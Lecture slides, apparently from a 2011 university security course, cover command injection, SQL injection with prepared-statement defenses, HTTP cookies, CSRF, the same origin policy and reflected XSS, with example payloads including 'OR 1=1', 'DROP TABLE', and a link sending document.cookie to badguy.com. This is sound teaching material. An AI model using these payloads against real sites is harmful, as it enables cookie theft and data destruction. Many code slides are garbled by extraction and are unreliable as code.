-
8/13/2019 2.22.Web Attacks
1/72
Web Attacks, cont
CS 161: Computer Security Prof. Vern Paxson
TAs: Devdatta Akhawe, Mobin Javed
& Matthias
Vallentinhttp://inst.eecs.berkeley.edu/~cs161/
February 22, 2011
-
8/13/2019 2.22.Web Attacks
2/72
Announcements
See Still confused about question 4submission format thread in
Piazzza(@116)
Guest lecture a week from Thursday(March 3rd), Prof. David
Wagner My office hours the week of March 7th will be
by appointment I may move my office hours next Monday
to 1-2PM - if so, will announce on Piazzza Let me know if this
would be a hardship
-
8/13/2019 2.22.Web Attacks
3/72
Defending Against
Command Injection In principle, can prevent injection
attacks
by properly sanitizing input sent to web
servers Remove or escape meta-characters Easy to get wrong by
overlooking a meta-
character or escaping subtlety
Better: avoid using a feature-rich API KISS + defensive
programming E.g., use !"!#$!%& to invoke a desired
program, rather than '(')!*%&
-
8/13/2019 2.22.Web Attacks
4/72
Command Injection in the Real World
-
8/13/2019 2.22.Web Attacks
5/72
Command Injection in the Real World
-
8/13/2019 2.22.Web Attacks
6/72
-
8/13/2019 2.22.Web Attacks
7/72
-
8/13/2019 2.22.Web Attacks
8/72
Structure of Modern Web Services
BrowserWeb
server
URL / Form
command.php?arg1=x&arg2=y
-
8/13/2019 2.22.Web Attacks
9/72
-
8/13/2019 2.22.Web Attacks
10/72
Structure of Modern Web Services
BrowserWeb
server
Databaseserver
Custom datacorresponding to x & y
-
8/13/2019 2.22.Web Attacks
11/72
Structure of Modern Web Services
BrowserWeb
server
Web page builtusing custom data
Databaseserver
-
8/13/2019 2.22.Web Attacks
12/72
SQL
Widely used database query language Fetch a set of records
SELECT * FROM Person WHERE Username=oski
Add data to the tableINSERT INTO Person (Username, Balance)
VALUES (oski, 10) -- oski has ten buckaroos
Modify dataUPDATE Person SET Balance=42 WHEREUsername=oski
Query syntax (mostly) independent of vendor
An SQL comment
-
8/13/2019 2.22.Web Attacks
13/72
SQL Injection Scenario
Suppose web server front end stores URLparameter +!#,-,!.) in
variable /+!#,-,!.)and then builds up a string with the
followingSQL query:$sql = "SELECT PersonID FROM Person WHERE
Balance < 100 AND Username='$recipient' ";
Query accesses recipients account if their balance is <
100.
-
8/13/2019 2.22.Web Attacks
14/72
SQL Injection Scenario
Suppose web server front end stores URLparameter +!#,-,!.) in
variable /+!#,-,!.)and then builds up a string with the
followingSQL query:$sql = "SELECT PersonID FROM Person WHERE
Balance < 100 AND Username='$recipient' ";
So for ?recipient=Bob the SQL query is:"SELECT PersonID FROM
Person
WHERE Balance < 100 AND Username='Bob' "
-
8/13/2019 2.22.Web Attacks
15/72
SQL Injection Scenario
Suppose web server front end stores URLparameter +!#,-,!.) in
variable /+!#,-,!.)and then builds up a string with the
followingSQL query:$sql = "SELECT PersonID FROM Person WHERE
Balance < 100 AND Username='$recipient' ";
How can recipient cause trouble here? How can we see anyones
account?
-
8/13/2019 2.22.Web Attacks
16/72
SQL Injection Scenario, cont
WHERE Balance < 100 AND Username='$recipient' "
$recipient = foo ' OR 1=1 --WHERE Balance < 100 AND
Username='foo' OR 1=1 --' "
Precedence & -- (comment) makes this:WHERE (Balance < 100
AND
Username='foo') OR 1=1 Always true!
-
8/13/2019 2.22.Web Attacks
17/72
SQL Injection Scenario, cont
WHERE Balance < 100 AND Username='$recipient' ";
How about recipient = foo '; DROP TABLE Person; -- ?
Now there are two separate SQLcommands, thanks to ;
command-separator.
Can change database however you wish
-
8/13/2019 2.22.Web Attacks
18/72
Defenses (work-in-progress)
!"#$%"$& (%))*+, -*+ .*#(,+%./#$ 0%&+1&(!"#$%&'
)*#+' ,-+*$-*+# %./#"#./#.- 0& *,#+ %."*-1
Defenses
-
8/13/2019 2.22.Web Attacks
19/72
Defenses (work-in-progress)
!"#$%"$& (%))*+, -*+ .*#(,+%./#$ 0%&+1&(!"#$%&'
)*#+' ,-+*$-*+# %./#"#./#.- 0& *,#+ %."*-1
2#,*3-!#- 4#-5+063#780..#$90. $0..: %.- *%/; -?@A$#"90.B !-+%.4
)*#+' C D!@?@8E "+063# F2GH I,#+, JK@2@ *%/ C LMDM
5+#"N+#/!-N-#O#.- " C $0..P"+#"N+#!-N-#O#.-7)*#+';M "P,#-Q.-7R:
*%/;M
+#-*+. "P#A#$*-#>*#+'7;MS
Defenses
Prepared Statement
-
8/13/2019 2.22.Web Attacks
20/72
Defenses (work-in-progress)
!"#$%"$& (%))*+, -*+ .*#(,+%./#$ 0%&+1&(!"#$%&'
)*#+' ,-+*$-*+# %./#"#./#.- 0& *,#+ %."*-1
2#,*3-!#- 4#-5+063#780..#$90. $0..: %.- *%/; -?@A$#"90.B !-+%.4
)*#+' C D!@?@8E "+063# F2GH I,#+, JK@2@ *%/ C LMDM
5+#"N+#/!-N-#O#.- " C $0..P"+#"N+#!-N-#O#.-7)*#+';M "P,#-Q.-7R:
*%/;M
+#-*+. "P#A#$*-#>*#+'7;MS
Defenses
Untrusted user input
-
8/13/2019 2.22.Web Attacks
21/72
Defenses (work-in-progress)
!"#$%"$& (%))*+, -*+ .*#(,+%./#$ 0%&+1&(!"#$%&'
)*#+' ,-+*$-*+# %./#"#./#.- 0& *,#+ %."*-1
2#,*3-!#- 4#-5+063#780..#$90. $0..: %.- *%/; -?@A$#"90.B !-+%.4
)*#+' C D!@?@8E "+063# F2GH I,#+, JK@2@ *%/ C LMDM
5+#"N+#/!-N-#O#.- " C $0..P"+#"N+#!-N-#O#.-7)*#+';M "P,#-Q.-7R:
*%/;M
+#-*+. "P#A#$*-#>*#+'7;MS
Defenses
Input is confined toa single SQL atom
-
8/13/2019 2.22.Web Attacks
22/72
Defenses (work-in-progress)
!"#$%"$& (%))*+, -*+ .*#(,+%./#$ 0%&+1&(!"#$%&'
)*#+' ,-+*$-*+# %./#"#./#.- 0& *,#+ %."*-1
2#,*3-!#- 4#-5+063#780..#$90. $0..: %.- *%/; -?@A$#"90.B !-+%.4
)*#+' C D!@?@8E "+063# F2GH I,#+, JK@2@ *%/ C LMDM
5+#"N+#/!-N-#O#.- " C $0..P"+#"N+#!-N-#O#.-7)*#+';M "P,#-Q.-7R:
*%/;M
+#-*+. "P#A#$*-#>*#+'7;MS
Defenses
Binds the valueof 0,1 to '?' atom
-
8/13/2019 2.22.Web Attacks
23/72
Defenses (work-in-progress)
!"#$%"$& (%))*+, -*+ .*#(,+%./#$ 0%&+1&(!"#$%&'
)*#+' ,-+*$-*+# %./#"#./#.- 0& *,#+ %."*-1
2#,*3-!#- 4#-5+063#780..#$90. $0..: %.- *%/; -?@A$#"90.B !-+%.4
)*#+' C D!@?@8E "+063# F2GH I,#+, JK@2@ *%/ C LMDM
5+#"N+#/!-N-#O#.- " C $0..P"+#"N+#!-N-#O#.-7)*#+';M "P,#-Q.-7R:
*%/;M
+#-*+. "P#A#$*-#>*#+'7;MS
Defenses
No matter what input user provides, Prepared Statementensures it
will be treated as a single SQL datum
-
8/13/2019 2.22.Web Attacks
24/72
Defenses (work-in-progress)
!"#$%"$& (%))*+, -*+ .*#(,+%./#$ 0%&+1&(!"#$%&'
)*#+' ,-+*$-*+# %./#"#./#.- 0& *,#+ %."*-1
2#,*3-!#- 4#-5+063#780..#$90. $0..: %.- *%/; -?@A$#"90.B !-+%.4
)*#+' C D!@?@8E "+063# F2GH I,#+, JK@2@ *%/ C LMDM
5+#"N+#/!-N-#O#.- " C $0..P"+#"N+#!-N-#O#.-7)*#+';M "P,#-Q.-7R:
*%/;M
+#-*+. "P#A#$*-#>*#+'7;MS
2345!667 /90'!+.:*!;< =!6#7*! >:#?@
Defenses
-
8/13/2019 2.22.Web Attacks
25/72
Defenses (work-in-progress)
!"#$%"$& (%))*+, -*+ .*#(,+%./#$ 0%&+1&(!"#$%&'
)*#+' ,-+*$-*+# %./#"#./#.- 0& *,#+ %."*-1
2#,*3-!#- 4#-5+063#780..#$90. $0..: %.- *%/; -?@A$#"90.B !-+%.4
)*#+' C D!@?@8E "+063# F2GH I,#+, JK@2@ *%/ C LMDM
5+#"N+#/!-N-#O#.- " C $0..P"+#"N+#!-N-#O#.-7)*#+';M "P,#-Q.-7R:
*%/;M
+#-*+. "P#A#$*-#>*#+'7;MS
2345!667 /90'!+.:*!;< =!6#7*! >:#?@
Defenses
Template languageensures variable fullyescaped
-
8/13/2019 2.22.Web Attacks
26/72
5 Minute Break
Questions Before We Proceed?
5 Minute Break
-
8/13/2019 2.22.Web Attacks
27/72
27
Basic Structure of Web Traffic
-
8/13/2019 2.22.Web Attacks
28/72
28
Basic Structure of Web Traffic
Includes resource from URL
Headers describing browser capabilities Associated data for
POST
-
8/13/2019 2.22.Web Attacks
29/72
29
Basic Structure of Web Traffic
Includes resource from URL
Headers describing browser capabilities Associated data for
POST
-
8/13/2019 2.22.Web Attacks
30/72
GET /login.html?user=alice&pass=bigsecret HTTP/1.1 Accept:
image/gif, image/x-bitmap, image/jpeg, */* Accept-Language: en
Connection: Keep-AliveUser-Agent: Mozilla/1.22 (compatible; MSIE
2.0; Windows 95)Host: mybank.com Referer:
http://www.google.com?q=mybank%20berkeley
HTTP Request
Method Resource HTTP version Headers
Data (if POST; none for GET)
Blank line
GET: download data. POST: upload data.
-
8/13/2019 2.22.Web Attacks
31/72
31
Basic Structure of Web Traffic
Includes status codeHeaders describing the answer
Data for returned item
-
8/13/2019 2.22.Web Attacks
32/72
HTTP/1.0 200 OKDate: Sat, 19 Feb 2011 02:20:42 GMTServer:
Microsoft-Internet-Information-Server/5.0Connection:
keep-aliveContent-Type: text/htmlLast-Modified: Fri, 18 Feb 2011
17:39:05 GMTContent-Length: 2543
Some data... blah, blah, blah
HTTP Response
HTTP version Status code Reason phrase Headers
Data
-
8/13/2019 2.22.Web Attacks
33/72
33
HTTP Cookies
Includes status codeHeaders describing answer, incl. cookies
Data for returned item
Servers can include cookies in their replies:state that clients
store and return on anysubsequent queries to the same
server/domain
-
8/13/2019 2.22.Web Attacks
34/72
HTTP/1.0 200 OKDate: Sun, 19 Apr 2009 02:20:42 GMTServer:
Microsoft-Internet-Information-Server/5.0Connection:
keep-aliveContent-Type: text/htmlLast-Modified: Sat, 18 Apr 2009
17:39:05 GMTSet-Cookie: session=44ebc991;
path=/servletsContent-Length: 2543
Some data... blah, blah, blah
HTTP Response
HTTP version Status code Reason phrase Headers
Data
Cookies Can include a session identifier that tracksa user once
they have authenticated
-
8/13/2019 2.22.Web Attacks
35/72
35
Cookies & Follow-On Requests
Includes resource from URLHeaders describing browser
capabilities, including cookies Associated data for POST
-
8/13/2019 2.22.Web Attacks
36/72
GET /moneyxfer.cgi?account=alice&amt=50&to=bob HTTP/1.1
Accept: image/gif, image/x-bitmap, image/jpeg, */* Accept-Language:
en
Connection: Keep-AliveUser-Agent: Mozilla/1.22 (compatible; MSIE
2.0; Windows 95)Host: mybank.com Cookie: session=44ebc991;
path=/servletsReferer:
http://mybank.com/login.html?user=alice&pass...
HTTP Request
Method Resource HTTP version
Headers
Data (if POST; none for GET)
Blank line
GET: download data. POST: upload data.
-
8/13/2019 2.22.Web Attacks
37/72
Web Browser Threats
What can happen? Compromise
Inject code / install malware
Theft Of authentication Of private/sensitive information
Manipulation Fool a user about what theyre seeing Take actions
user doesnt intend (theft of volition)
And what makes the problem particularly tricky? Users are hugely
reliant upon browsing
-
8/13/2019 2.22.Web Attacks
38/72
Simple Static HTML Content
Test Page Test Page
This is a test!
Threats?
-
8/13/2019 2.22.Web Attacks
39/72
2A7+* :#),7.BCD))-EFF>,)@>GF:F-:(-:6@-D-C*!)D71BC-7')C
.:*!BH:)!4
Phishing
-
8/13/2019 2.22.Web Attacks
40/72
Generating Web Accesses
Test Page
Test Page
This is a test!
When we visit a web site, they cancause us to fetch any URL they
wish
Threats?
-
8/13/2019 2.22.Web Attacks
41/72
Web Accesses w/ Side Effects
Recall our earlier banking URL:
D))-EFF*(>:.?@#7*F*7.!("A!+@#G,I:##70.)B:6,#!J:*)BKLJ)7B>7>
So what happens if we visit !$,6',)!@#7* , whichincludes:
2,*G '+#BCD))-EFF*(>:.?@#7*F*7.!("A!+@#G,I
M##70.)B:6,#!J:*)BKLLLLLJ)7BH+N$,6C4
Cross-Site Request Forgery (CSRF ) attack
-
8/13/2019 2.22.Web Attacks
42/72
CSRF Defenses
Defenses? Inspect O!A!+!+ headers ( require it to be from
*(>:.?@#7* )
Referer: http://evilsite.com/testpage.html Or: require
authentication (not just session
cookie!) for serious requests Or: use distinct URLs (including
randomized
components ) for bank web pages whose formsusers should use for
serious requests
Note: only the server can do these!
-
8/13/2019 2.22.Web Attacks
43/72
Or what else?Java, Flash,
Active-X, PDF
Javascript demo page
var a = 1;var b = 2;document.write(a+b);
Or what else?
Dynamic Web Pages
Rather than static HTML, web pages can beexpressed as a program
, say written in Javascript :
Threats?
-
8/13/2019 2.22.Web Attacks
44/72
Drive-By Downloads
-
8/13/2019 2.22.Web Attacks
45/72
-
8/13/2019 2.22.Web Attacks
46/72
-
8/13/2019 2.22.Web Attacks
47/72
-
8/13/2019 2.22.Web Attacks
48/72
-
8/13/2019 2.22.Web Attacks
49/72
-
8/13/2019 2.22.Web Attacks
50/72
-
8/13/2019 2.22.Web Attacks
51/72
-
8/13/2019 2.22.Web Attacks
52/72
-
8/13/2019 2.22.Web Attacks
53/72
-
8/13/2019 2.22.Web Attacks
54/72
-
8/13/2019 2.22.Web Attacks
55/72
-
8/13/2019 2.22.Web Attacks
56/72
Subversive Script Execution
-
8/13/2019 2.22.Web Attacks
57/72
Browser Windows Interact
-
8/13/2019 2.22.Web Attacks
58/72
-
8/13/2019 2.22.Web Attacks
59/72
Browser Windows Interact
Script in here
Needs to access /update state here
-
8/13/2019 2.22.Web Attacks
60/72
Browser Windows Interact
Script in here
Needs to access /update state here
How to control just what scripts are allowed to do?
-
8/13/2019 2.22.Web Attacks
61/72
Same Origin Policy
Every frame in a browser window has a domain Domain = from which
the
frame content was downloadedServer = ):+G!)@#7* , protocol =
HTTP (maybe HTTPS)
Code downloaded in a frame can only accessresources associated
with that domain Access = read and modify values, incl. page
contents
Given this Same Origin Policy ( SOP ), how can anattacker get a
script of their choosing executed inthe domain ):+G!)@#7* ? If they
can, then disaster : they can manipulate victims
interactions with ):+G!)@#7* in all sorts of ways
-
8/13/2019 2.22.Web Attacks
62/72
-
8/13/2019 2.22.Web Attacks
63/72
Cross-Site Scripting (XSS)
Attack Server
Victim client
v i s i t w e b s i t e
1
-
8/13/2019 2.22.Web Attacks
64/72
Cross-Site Scripting (XSS)
Attack Server
Victim client
v i s i t w e b s i t e
r e c e i v e m a l i c i o
u s p a g e1
2
-
8/13/2019 2.22.Web Attacks
65/72
-
8/13/2019 2.22.Web Attacks
66/72
Cross-Site Scripting (XSS)
Victim client c l i c k o n l i n k e c h o u s e r i n p u
t
3 4
Server Patsy/Victim
Attack Server v i s i t w
e b s i t e
r e c e i v e m a l i c i o
u s p a g e1
2
-
8/13/2019 2.22.Web Attacks
67/72
Cross-Site Scripting (XSS)
Victim client c l i c k o n l i n k e c h o u s e r i n p u
t
3 4
Server Patsy/Victim
Attack Server v i s i t w
e b s i t e
r e c e i v e m a l i c i o
u s p a g e1
2
execute scriptembedded in inputas though server meant us to run
it
5
-
8/13/2019 2.22.Web Attacks
68/72
Cross-Site Scripting (XSS)
Victim client c l i c k o n l i n k e c h o u s e r i n p u
t
3 4
Server Patsy/Victim
Attack Server v i s i t w
e b s i t e
r e c e i v e m a l i c i o
u s p a g e1
2
execute scriptembedded in inputas though server meant us to run
it
5 p e r f o r m a t t a c k e r a c t i o n
6
-
8/13/2019 2.22.Web Attacks
69/72
Cross-Site Scripting (XSS)
Attack Server
Victim client c l i c k o n l i n k e c h o u s e r i n p u
t
3
s e n d v a l u a b l e d a t a
7
4
Server Patsy/Victim
v i s i t w e b s i t e
r e c e i v e m a l i c i o
u s p a g e1
2
execute scriptembedded in inputas though server meant us to run
it
5
And/Or:
-
8/13/2019 2.22.Web Attacks
70/72
Cross-Site Scripting (XSS)
Attack Server
Victim client
v i s i t w e b s i t e
r e c e i v e m a l i c i o
u s p a g e
c l i c k o n l i n k e c h o u s e r i n p u t
1
2
3 4
(Reflected XSS attacks)
Server Patsy/Victimexecute scriptembedded in inputas though
server meant us to run it
5
s e n d v a l u a b l e d a t a
7
p e r f o r m a t t a c k e r a c t i o n
6
-
8/13/2019 2.22.Web Attacks
71/72
71
The Setup
User input is echoed into HTML response.
Example : search field
http://victim.com/search.php?term= apple search.php responds
with:
Search Results
Results for :. . .
How can an attacker exploit this?
-
8/13/2019 2.22.Web Attacks
72/72
Injection Via Bad Input
Consider link: (properly URL
encoded)http://victim.com/search.php?term=
window.open(
"http://badguy.com?cookie = " +document.cookie )
What if user clicks on this link?1) Browser goes to
$,#),*@#7*F'!:+#D@-D-
P& $,#),*@#7* returns Results for 3) Browser executes script
in same origin as $,#),*@#7*
Sends >:1G0(@#7* cookie for $,#),*@#7*Or any other arbitrary
execution / rewrite !"#$"%'% page
